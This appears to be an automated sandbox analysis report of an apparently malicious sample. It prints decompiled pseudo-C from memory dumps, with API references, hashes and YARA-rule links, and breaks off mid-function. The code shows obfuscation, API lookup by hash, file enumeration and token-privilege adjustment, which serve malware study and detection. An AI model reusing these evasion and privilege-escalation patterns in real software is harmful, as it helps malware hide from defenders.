0x100188c2
0x100188c8
0x100188cd
0x100188d0
0x100188d2
0x100188d5
0x100188d7
0x1001894a
0x00000000
0x1001894a
0x100188dc
0x100188df
0x100188e3
0x100188e3
0x100188e9
0x100188ec
0x100188f0
0x100188f8
0x10018905
0x10018910
0x10018915
0x1001891c
0x10018923
0x10018928
0x1001892e
0x10018933
0x10018935
0x10018937
0x1001893a
0x00000000
0x00000000
0x1001893f
0x10018943
0x10018946
0x10018948
0x00000000
0x00000000
0x00000000
0x10018948
0x00000000
0x10018951
0x100188a5

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5793715910ccdb263a206309fb963b3f3cdb359ba87feeb644afa1c1fbd80f
Instruction ID: 740fac4245e465097b4ddf2ee95f14fac7dd22a3ebc499f3bc92cac224e6794b
Opcode Fuzzy Hash: bb5793715910ccdb263a206309fb963b3f3cdb359ba87feeb644afa1c1fbd80f
Instruction Fuzzy Hash: 2F31B8B6D001165BEB10CA54DC42ABA77A8EF41398F554134FD08AB342EB31EF51C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 10009C60, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10009C60(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				signed int _t42;
				signed int _t44;
				signed char _t45;
				signed int _t49;
				signed char _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t75;
				signed int _t76;
				signed int _t88;
				signed int _t94;
				signed int _t95;

				_t95 = _a12;
				_t35 = _a4 * 0xffffffa5 * _t95;
				_t53 = _t35 - _t95;
				_t49 = 0;
				if((_t35 >> 0x0000001f ^ _a16 | _t35 ^ _t95) != 0) {
					_t36 = _a4;
					_t75 =  !_t95 & (_t53 | _t35) + _t36;
					_t38 = _t75 * 0x73;
					_t53 = _t75;
					_t76 = _t36;
				} else {
					_t38 = 0;
					_t76 = _a4;
				}
				asm("sbb edx, [ebp+0xc]");
				if(_t95 >= _t76) {
					_t49 = 0x3a1;
				}
				_t56 = _t53;
				_t94 = (_t38 & _t95 ^ _t49) * _t56 * 0x77;
				_t57 = _t56 ^ _t94;
				_t42 = _t49;
				_v24 = _t57;
				_v32 = _t42;
				_t51 = _t57 * _t42;
				_t44 = E10007DD0(0xc5) * _t51;
				_v17 = _t44;
				_v28 = _t94;
				_t45 = _t44 * _t94;
				_t60 = _a8;
				asm("sbb edx, ecx");
				if(_t51 >= _a4) {
					L8:
					_t88 = (_v24 + _t45 * _a4 - _t45 * _a4 ^ _v28) + _t45 * _a4 ^ _v17;
				} else {
					_t88 = _t60 ^ _a16 | _t95 ^ _a4;
					if(_t88 == 0 || (_t51 >> 0x0000001f ^ _a16 | _t95 ^ _t51) != 0) {
						goto L8;
					}
				}
				 *0x10022100 = _t88;
				return _v32;
			}

0x10009c69
0x10009c73
0x10009c7c
0x10009c85
0x10009c89
0x10009c94
0x10009c9f
0x10009ca4
0x10009ca7
0x10009ca9
0x10009c8b
0x10009c8b
0x10009c8d
0x10009c8d
0x10009cb0
0x10009cb3
0x10009cb5
0x10009cb5
0x10009cbe
0x10009cc4
0x10009cc7
0x10009cc9
0x10009ccb
0x10009cd0
0x10009cd3
0x10009ce3
0x10009ce5
0x10009cea
0x10009ced
0x10009cfa
0x10009cfd
0x10009cff
0x10009d1e
0x10009d38
0x10009d01
0x10009d0b
0x10009d0d
0x00000000
0x00000000
0x10009d0d
0x10009d3a
0x10009d4a

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a4539627b0deba35ad1ac2ee98ac5344af42b386dbc77c4a4b0cf8185c8c13
Instruction ID: 79617a935c26c87d18bd50a51ff251bc6fae32498266042dec3eb45ed514d06b
Opcode Fuzzy Hash: 70a4539627b0deba35ad1ac2ee98ac5344af42b386dbc77c4a4b0cf8185c8c13
Instruction Fuzzy Hash: 1C31D731F000195BAB0CCE6DC8D29BFBBEBEBC4241B14C12FE809DB259D9309A068780

Uniqueness

Uniqueness Score: -1.00%

Function 1005C4CA, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295167038.000000001005C000.00000040.00020000.sdmp, Offset: 1005C000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 523555d3b99e0df9162d14ef1718a185e5c5871774585ee75c80fee981211ec2
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: A911B1733405049FD754CE99DC91EA673DAEB882707298166ED05CB315E636FC45C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1005C8C3, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295167038.000000001005C000.00000040.00020000.sdmp, Offset: 1005C000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: f7131785232424772614540e10057430b6978c053bb705dfd05f4d46bd4c9040
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: ED01283B3042498FC718CF29D888D7DB7E8EBC1370B15C17EC84683615D134E849C920

Uniqueness

Uniqueness Score: -1.00%

Function 1001CE40, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001CE40(short* _a4, intOrPtr _a8) {
				void* _t8;
				short* _t9;
				intOrPtr _t10;
				short* _t11;
				void* _t12;

				_t10 = _a8;
				_t11 = _a4;
				if(_t10 != 0) {
					_t11 = _t11 + 2;
					_t9 = 0;
					while( *((short*)(_t11 - 2)) != 0) {
						L3:
						_t11 = _t11 + 2;
					}
					if( *_t11 == 0) {
						_t11 = 0;
					} else {
						_t8 = E10009D50(0x1e99166a);
						_t12 = _t12 + 4;
						_t9 = _t9 + _t8 - 0x7aed16c5;
						if(_t9 != _t10) {
							goto L3;
						} else {
						}
					}
				}
				return _t11;
			}

0x1001ce46
0x1001ce49
0x1001ce4e
0x1001ce50
0x1001ce53
0x1001ce5a
0x1001ce60
0x1001ce60
0x1001ce63
0x1001ce6e
0x1001ce8a
0x1001ce70
0x1001ce75
0x1001ce7a
0x1001ce7d
0x1001ce86
0x00000000
0x00000000
0x1001ce88
0x1001ce86
0x1001ce6e
0x1001ce92

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b0c5c1ae22092c738313b0aadfa3d1c82a8b0fa8c594128a00243877a34558
Instruction ID: 11df39f1b68db8f0ff80125d8ccc813ecc23169dfcda37895e74825ef1acd456
Opcode Fuzzy Hash: f8b0c5c1ae22092c738313b0aadfa3d1c82a8b0fa8c594128a00243877a34558
Instruction Fuzzy Hash: 41F0EC66E4023C96E720DE54D882C5BF7F5EB516D4F16802ADC0957240F3B1ECC8C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 10012EF0, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012EF0() {

				return  *[fs:0x30];
			}

0x10012ef6

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 100046E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100046E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x100046e7
0x100046ea
0x100046ed
0x100046f4
0x100046fa
0x100046ff
0x10004709
0x10004711
0x10004713
0x10004715
0x10004718
0x10004720
0x10004725
0x10004781
0x10004784
0x10004786
0x10004791
0x1000479a
0x1000479f
0x100047a1
0x100047a3
0x100047ab
0x00000000
0x00000000
0x1000472c
0x10004731
0x1000473a
0x100047ad
0x100047ad
0x100047b6
0x100047ca
0x100047ca
0x100047cd
0x100047d1
0x100047e2
0x100047e7
0x100047f9
0x100047fc
0x100047fe
0x10004800
0x10004806
0x10004808
0x1000480a
0x10004810
0x1000481d
0x10004838
0x10004838
0x10004810
0x10004844
0x10004844
0x100047b8
0x100047be
0x00000000
0x100047c5
0x100047c5
0x00000000
0x100047c5
0x100047be
0x1000473c
0x10004743
0x10004745
0x1000474d
0x10004845
0x10004753
0x1000475d
0x10004760
0x1000476d
0x10004773
0x1000477c
0x1000477c
0x1000474d
0x10004743

APIs

OffsetRect.USER32(?,-13D81D33,-13D81D33), ref: 100046FF
LookupPrivilegeValueW.ADVAPI32(00000000,-10021D33,?), ref: 10004791
EndDialog.USER32(-10021D33,?), ref: 100047D1
SetTextColor.GDI32(-12541D33,-13D81D33), ref: 1000481D

Strings

KAw, xrefs: 100047D1

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID: KAw
API String ID: 2289036324-3669657816
Opcode ID: d5f9e76acf50ff6b7278e2863d1cc109139249a7d416316726963648cce9b258
Instruction ID: 4851e4dca631ff0eb8a953ec31bcb0583554c2f5a38d6d964116db804b065308
Opcode Fuzzy Hash: d5f9e76acf50ff6b7278e2863d1cc109139249a7d416316726963648cce9b258
Instruction Fuzzy Hash: EA410572B006285BEB08CE58CCE06BF77EAEB85391B57852DFC199B745CA30AD458784

Uniqueness

Uniqueness Score: -1.00%

Function 100029D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100029D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -268556747
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -268555875
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -268556698
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x100029d7
0x100029df
0x100029e1
0x100029e5
0x100029f0
0x100029f5
0x10002a01
0x10002a17
0x10002a1f
0x10002a2b
0x10002a2b
0x10002a31
0x10002a34
0x10002a37
0x10002a3d
0x10002a41
0x10002a43
0x10002a43
0x10002a4b
0x10002a51
0x10002a53
0x10002a57
0x10002a59
0x10002a5c
0x10002a62
0x10002a6f
0x10002a81

APIs

DeleteDC.GDI32(-1001DD33), ref: 100029E5
SetWindowPos.USER32(-1001DD33,10007BEC,00000191,10007BEC,10007BEC,10007BEC,00000191,?,10007BEC,-10021FA0,-13D81D33,-10021D33,?,10009287,-10021D33), ref: 10002A1F
ResetEvent.KERNEL32(-1001D663,?,10007BEC,-10021FA0,-13D81D33,-10021D33,?,10009287,-10021D33,?,100077A1,00000001,?,-10021D33,?,10006A74), ref: 10002A4B
CreateDIBSection.GDI32(-1001D99A,-1001D99A,-1001D9CB,-1001D663,-1001D9CB,-1001D9CB), ref: 10002A6F

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: 0e78b0e9585b00f1a88b94858bda9bebf785be51a9b9885a1d4dc2d5750ceee7
Instruction ID: 569652bf3164cf6143b8a5c5d23c4ef1123a7bba1b64e7b43fadfd69694f6b3e
Opcode Fuzzy Hash: 0e78b0e9585b00f1a88b94858bda9bebf785be51a9b9885a1d4dc2d5750ceee7
Instruction Fuzzy Hash: F911C873B002247FE7248A5ACCC9EDBBA5EE7C9750F060126F949DB151D9716F0586E0

Uniqueness

Uniqueness Score: -1.00%

Function 10001590, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001590(struct HWND__* _a4) {
				signed int _t5;
				signed int _t13;
				int _t16;
				signed int _t24;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t31;

				_t31 = _a4;
				_t16 = (_t31 * 0xda000000 >> 0x18) * _t31;
				RegOpenKeyW(_t16, _t16, _t16);
				_t5 = _t16 - _t31;
				_t24 = _t5 * _t16;
				_t30 = _t5 ^ _t24;
				if(_t16 == _t31 || _t24 == _t31) {
					L5:
					EndDialog(_t31, _t16);
					return  !_t31 & (_t16 ^ _t30) * _t30;
				}
				_t13 = _t24 * _t24 * _t30;
				_t29 = _t13 | _t31;
				_t16 = ((_t29 << 0x18) + 0xb2000000 >> 0x18) + _t29;
				if(_t24 >= _t31 || _t29 != _t31 || _t30 == _t31) {
					goto L5;
				}
				return _t13;
			}

0x10001596
0x100015a2
0x100015a8
0x100015b2
0x100015b7
0x100015bc
0x100015c0
0x100015f8
0x100015fa
0x00000000
0x1000160c
0x100015d0
0x100015d5
0x100015e5
0x100015e9
0x00000000
0x00000000
0x10001612

APIs

RegOpenKeyW.ADVAPI32 ref: 100015A8
EndDialog.USER32(10007BAC), ref: 100015FA

Strings

KAw, xrefs: 100015FA

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: DialogOpen
String ID: KAw
API String ID: 603626419-3669657816
Opcode ID: 7d3c641f7b616c9170967d1d194ba524d28c308014f5d27237a296a9c45b9bd6
Instruction ID: 55e7765c036d3a0091c4e337392aa813aba19e48f55488e00e277922a174d1e7
Opcode Fuzzy Hash: 7d3c641f7b616c9170967d1d194ba524d28c308014f5d27237a296a9c45b9bd6
Instruction Fuzzy Hash: 36012D63740B391BB70C85AD4DD567FD4CFC7D9AD275A503BF106CA666D454CD0202E4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 6160 Parent PID: 5312 msiexec.exeCOMMON

Executed Functions

Function 0035F4E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0035F4E0(void* __eflags) {
				char _v29;
				intOrPtr _v34;
				intOrPtr _v300;
				signed int _v308;
				intOrPtr _v312;
				char _v316;
				char _v370;
				char _v444;
				struct _WIN32_FIND_DATAW _v1036;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr _t39;
				signed int _t40;
				WCHAR* _t42;
				void* _t45;
				signed int _t46;
				signed int _t49;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t57;
				signed int _t61;
				void* _t62;
				signed char _t63;
				signed int _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t78;
				char* _t84;
				intOrPtr _t85;
				void* _t88;
				void* _t89;
				void* _t91;
				void* _t94;
				void* _t102;

				_t84 =  &_v316;
				E00368F20(_t84, 0x11c);
				_v316 = 0x11c;
				_t36 = E0035BF50(__eflags, 0, 0x44f8007);
				_t91 = _t89 + 0x10;
				_t37 =  *_t36(_t84);
				_t66 = 0;
				if(_t37 == 0 || _v300 != 2) {
					L16:
					return _t66;
				} else {
					_t39 = _v34;
					if(_t39 + 0xfe >= 2) {
						__eflags = _t39 - 1;
						if(_t39 != 1) {
							goto L16;
						}
						_t85 = _v312;
						__eflags = _t85 - 6;
						if(_t85 == 6) {
							_t40 = _v308;
							__eflags = _t40;
							if(_t40 == 0) {
								_t66 = 4;
								goto L16;
							}
							__eflags = _t40 - 1;
							if(_t40 != 1) {
								L21:
								_t42 = E00357200(0x370b30,  &_v444);
								E0035BF50(__eflags, 0, E00359D50(0x6e92342b));
								_t94 = _t91 + 0x14;
								_t45 = FindFirstFileW(_t42,  &_v1036); // executed
								__eflags = _t45 - 0xffffffff;
								if(__eflags == 0) {
									L27:
									_t46 = E00360340(__eflags);
									__eflags = _t46;
									if(_t46 == 0) {
										_t66 = 0xa;
									} else {
										_t49 = E0035AAE0(E0035D0A0( &_v29, "TI{?",  &_v29), _t46, _t48);
										__eflags = _t49;
										_t34 = (0 | _t49 != 0x00000000) + 8; // 0x8
										_t66 = (_t49 != 0) + _t34;
										E0035B570(_t46);
									}
									goto L16;
								}
								_t88 = _t45;
								do {
									_t51 = E003520A0(__eflags, _v1036.dwFileAttributes, 0xffffffff);
									_t52 = E003520A0(__eflags, 0x10, 0xffffffff);
									_t53 = E00359D50(0xf20e1f97);
									_t54 = E003520A0(__eflags, _t52 | _t51, 0xffffffff);
									E00359D50(0x647400bc);
									_t102 = _t94 + 0x20;
									__eflags = _t54 & (_t53 | 0x6985e0c4);
									if(__eflags == 0) {
										goto L23;
									}
									_t61 = E0036D530( &(_v1036.cFileName),  &(_v1036.cFileName), E00357200(0x370450,  &_v370));
									_t102 = _t102 + 0x10;
									__eflags = _t61;
									if(__eflags == 0) {
										goto L23;
									}
									_t66 = 0xc;
									goto L16;
									L23:
									E0035BF50(__eflags, 0, 0x2a85667);
									_t94 = _t102 + 8;
									_t57 = FindNextFileW(_t88,  &_v1036); // executed
									__eflags = _t57;
								} while (__eflags != 0);
								goto L27;
							}
							_t66 = 6;
							goto L16;
						}
						__eflags = _t85 - 5;
						if(_t85 != 5) {
							_t62 = E00359D50(0x647400a9);
							_t91 = _t91 + 4;
							__eflags = _t85 - _t62;
							if(_t85 <= _t62) {
								goto L16;
							}
							goto L21;
						} else {
							_t63 = E003555C0(_v308, 0);
							_t66 = 1;
							__eflags = _t63 & 0x00000001;
							if((_t63 & 0x00000001) == 0) {
								_t64 = _v308;
								_t66 = 2;
								__eflags = _t64 - 1;
								if(_t64 != 1) {
									__eflags = _t64 - 2;
									_t66 = (0 | _t64 == 0x00000002) + (0 | _t64 == 0x00000002);
								}
							}
							goto L16;
						}
					}
					_t65 = _v312;
					if(_t65 == 6) {
						_t78 = _v308;
						__eflags = _t78 - 4;
						if(_t78 >= 4) {
							L15:
							__eflags = _t65 - 6;
							_t18 = _t65 - 6 > 0;
							__eflags = _t18;
							_t66 = (0 | _t18) + (0 | _t18) * 8;
							goto L16;
						}
						_t66 = _t78 + _t78 + 5;
						goto L16;
					}
					if(_t65 != 5) {
						goto L15;
					}
					_t66 = 3;
					if(_v308 != 2) {
						goto L15;
					} else {
						goto L16;
					}
				}
			}

0x0035f4ec
0x0035f4f8
0x0035f500
0x0035f511
0x0035f516
0x0035f51a
0x0035f51c
0x0035f520
0x0035f5c5
0x0035f5d1
0x0035f533
0x0035f533
0x0035f53e
0x0035f560
0x0035f562
0x00000000
0x00000000
0x0035f564
0x0035f56a
0x0035f56d
0x0035f5d2
0x0035f5d8
0x0035f5da
0x0035f73b
0x00000000
0x0035f73b
0x0035f5e0
0x0035f5e3
0x0035f5fd
0x0035f609
0x0035f623
0x0035f628
0x0035f633
0x0035f635
0x0035f638
0x0035f6fc
0x0035f6fc
0x0035f701
0x0035f703
0x0035f745
0x0035f705
0x0035f71a
0x0035f724
0x0035f729
0x0035f729
0x0035f72e
0x0035f733
0x00000000
0x0035f703
0x0035f63e
0x0035f671
0x0035f679
0x0035f687
0x0035f698
0x0035f6ab
0x0035f6ba
0x0035f6bf
0x0035f6c2
0x0035f6c4
0x00000000
0x00000000
0x0035f6e2
0x0035f6e7
0x0035f6ea
0x0035f6ec
0x00000000
0x00000000
0x0035f6f2
0x00000000
0x0035f650
0x0035f657
0x0035f65c
0x0035f667
0x0035f669
0x0035f669
0x00000000
0x0035f671
0x0035f5e5
0x00000000
0x0035f5e5
0x0035f56f
0x0035f572
0x0035f5f1
0x0035f5f6
0x0035f5f9
0x0035f5fb
0x00000000
0x00000000
0x00000000
0x0035f574
0x0035f57c
0x0035f584
0x0035f589
0x0035f58b
0x0035f58d
0x0035f593
0x0035f598
0x0035f59b
0x0035f59f
0x0035f5a5
0x0035f5a5
0x0035f59b
0x00000000
0x0035f58b
0x0035f572
0x0035f540
0x0035f549
0x0035f5a9
0x0035f5af
0x0035f5b2
0x0035f5ba
0x0035f5bc
0x0035f5bf
0x0035f5bf
0x0035f5c2
0x00000000
0x0035f5c2
0x0035f5b4
0x00000000
0x0035f5b4
0x0035f54e
0x00000000
0x00000000
0x0035f557
0x0035f55c
0x00000000
0x0035f55e
0x00000000
0x0035f55e
0x0035f55c

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0035F633

Strings

TI{?, xrefs: 0035F70B

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: FileFindFirst
String ID: TI{?
API String ID: 1974802433-1624079526
Opcode ID: 630d5a334a8affb2de265c714f5f44dc32f119f746d0092bc36d7aa3032eda4c
Instruction ID: 9d422a01045fc30551dc11acf4309a179e3743d6a2b13ce23dede307184e11f8
Opcode Fuzzy Hash: 630d5a334a8affb2de265c714f5f44dc32f119f746d0092bc36d7aa3032eda4c
Instruction Fuzzy Hash: E9515C72D001155FDB2369A09C52FFF32589B12316F150571FD1AAA2F2FA119F4DCA62

Uniqueness

Uniqueness Score: -1.00%

Function 00369C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00369C90(void* __eflags, intOrPtr _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t26;
				int _t29;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				intOrPtr* _t34;
				signed char _t36;
				signed int _t37;
				signed int _t38;
				void** _t40;
				void* _t46;
				void* _t48;
				void* _t49;

				_t14 = E0035BF50(__eflags, 9, 0xbe1ef6e);
				_t15 = E0035BF50(__eflags, 0, 0x160d384);
				_t48 = _t46 + 0x10;
				_t16 =  *_t15();
				_t40 =  &_v20;
				_t17 =  *_t14(_t16, 0x20, 0, _t40);
				_t57 = _t17;
				if(_t17 != 0) {
					L2:
					_v36.PrivilegeCount = 1;
					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
					_t21 = E0035BF50(_t58, 9, 0xa2414e7);
					_t49 = _t48 + 8;
					_t22 =  *_t21(0, _a4,  &(_v36.Privileges));
					_t59 = _t22;
					if(_t22 == 0) {
						L5:
						_t38 = 0;
						__eflags = 0;
					} else {
						_t26 = E00359D50(0x647400a5);
						E0035BF50(_t59, _t26, E00359D50(0x68f91a9f));
						_t49 = _t49 + 0x10;
						_t29 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
						_t60 = _t29;
						if(_t29 == 0) {
							goto L5;
						} else {
							_t30 = E0035BF50(_t60, 0, 0xc702be2);
							_t49 = _t49 + 8;
							_t31 =  *_t30();
							_t61 = _t31;
							_t38 = _t37 & 0xffffff00 | _t31 == 0x00000000;
						}
					}
					_t23 = E0035BF50(_t61, 0, 0xb8e7db5);
					 *_t23(_v20);
				} else {
					_t32 = E00359D50(0x647400a5);
					_t34 = E0035BF50(_t57, _t32, E00359D50(0x6b5f7e12));
					_t36 = E003555C0( *_t34(0xffffffff, 0x20, _t40), 0);
					_t48 = _t48 + 0x18;
					_t58 = _t36 & 0x00000001;
					if((_t36 & 0x00000001) != 0) {
						_t38 = 0;
